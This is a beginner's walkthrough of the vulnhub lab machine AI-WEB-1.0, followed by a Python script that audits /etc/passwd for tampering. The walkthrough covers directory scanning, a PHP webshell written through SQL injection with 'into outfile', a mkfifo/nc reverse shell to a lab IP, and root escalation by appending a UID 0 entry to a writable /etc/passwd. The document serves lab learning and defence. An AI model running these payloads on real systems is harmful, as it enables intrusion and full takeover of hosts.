Record your vulnhub breakthrough record
2022-07-03 12:32:00 [Xiao Qin]
Preface
This article is just a record of my entry-level vulnhub walkthrough and some of the methods used. Since privilege escalation is new to me, the article focuses more on that part.
AI-WEB-1.0
First, the routine scan. I use masscan for the sweep (nmap is too slow).
Check your own network configuration in Kali first; the virtual network editor shows which subnet you are on.
masscan 192.168.252.0/24 --top-ports 100 --rate 1000
The scan shows a host in this range with port 80 open, so visit port 80.
Port 80 serves a page like this. Well, the conventional approach: run a directory scanner (dirsearch).
python3 dirsearch.py -u xxxx
Here we find robots.txt; visiting the paths in robots.txt turns up a SQL injection point. A SQL injection point can be used with select ... into outfile to write a webshell. (Let's review writing a webshell with into outfile.)
Example:
select '<?php phpinfo();eval($_POST[1]);?>' into outfile '<absolute path>';
Requirements for writing a webshell with into outfile:
(1) a high-privilege database account
(2) secure_file_priv must be '' (empty)
(3) you must know the absolute path of the web root

I got stuck here for a long time. The absolute path of a website is usually something like /var/www/html, but I could not connect. Only after reading someone else's writeup did I realize it was my own carelessness: the directories listed in robots.txt also need to be scanned (...)
Ahem, back to it: scanning them turns up info.php, which reveals the absolute path, so just try writing the webshell with into outfile.
Pitfall 1:
I thought it would be easy to write into any directory. Well, when the priv did not appear to be enabled, I assumed I had to do a log-file webshell instead, and tried for a long time........ to no avail. After copying the experts' writeups again, I found out my directory was simply wrong..............
Ahem, back to the point. After connecting to shell.php I found it runs with www-data privileges.
This definitely needs a privilege escalation step. I was confused here: sudo needs an interactive terminal to work.
Pitfall 2
Reverse shell. (Honestly, I cannot understand how the experts construct it: the bash reverse shell does not connect back, and nc gives no response when connecting.) Anyone who understands, please send me a private message.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.252.134 6666 >/tmp/f
With a working reverse shell, I found that /etc/passwd is readable and writable, so just write a root entry into it.
openssl passwd -1 -salt hack echo
This generates the MD5-crypt hash used in the entry below; append the entry like this:
echo 'echo:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash' >> /etc/passwd
Then use python to get an interactive tty:
python -c 'import pty;pty.spawn("/bin/bash")'
Escalated to root privileges.
Summary
(1) You can append a root entry to /etc/passwd to escalate privileges.
(2) openssl can be used to generate the password hash string.
(3) The odd form of the nc command (this rookie said he could not understand it).
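The flip side of the /etc/passwd trick above is that it is easy to spot. As an added defensive check (my own example, not part of the original write-up), this Python script audits passwd content for the symptoms the technique leaves behind: an extra UID 0 account, a password hash stored inline instead of 'x', and a file mode that lets non-root users write it. The sample content and its hash are constructed.

```python
import os
import stat

# Constructed sample /etc/passwd content (not from any real host). The last line has the
# shape of an appended root-equivalent account: UID 0, GID 0, MD5-crypt hash stored inline.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "echo:$1$salt$CONSTRUCTEDHASHVALUEONLY0:0:0:root:/root:/bin/bash\n"
)

# Values a healthy passwd file carries in the password field (real hash lives in /etc/shadow).
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!", ""}


def audit_passwd(text):
    """Return a list of (username, reason) findings for suspicious passwd entries."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
        if not uid.isdigit():
            findings.append((name, "non-numeric UID"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        if pw not in LOCKED_OR_SHADOWED:
            # A hash here bypasses /etc/shadow entirely; legitimate systems keep 'x'.
            findings.append((name, "password hash stored in /etc/passwd"))
    return findings


def passwd_mode_is_weak(mode):
    """True if st_mode grants write to group or others (expected mode is 0644)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def check_live_file(path="/etc/passwd"):
    """Audit a real passwd file: entry contents plus permission bits."""
    with open(path, encoding="utf-8") as fh:
        findings = audit_passwd(fh.read())
    if passwd_mode_is_weak(os.stat(path).st_mode):
        findings.append((path, "file is group/world writable"))
    return findings


if __name__ == "__main__":
    for who, why in audit_passwd(SAMPLE_PASSWD):
        print(f"{who}: {why}")
```

Run it against a live host with check_live_file(); the world-writable bit is what made the write possible on this box in the first place.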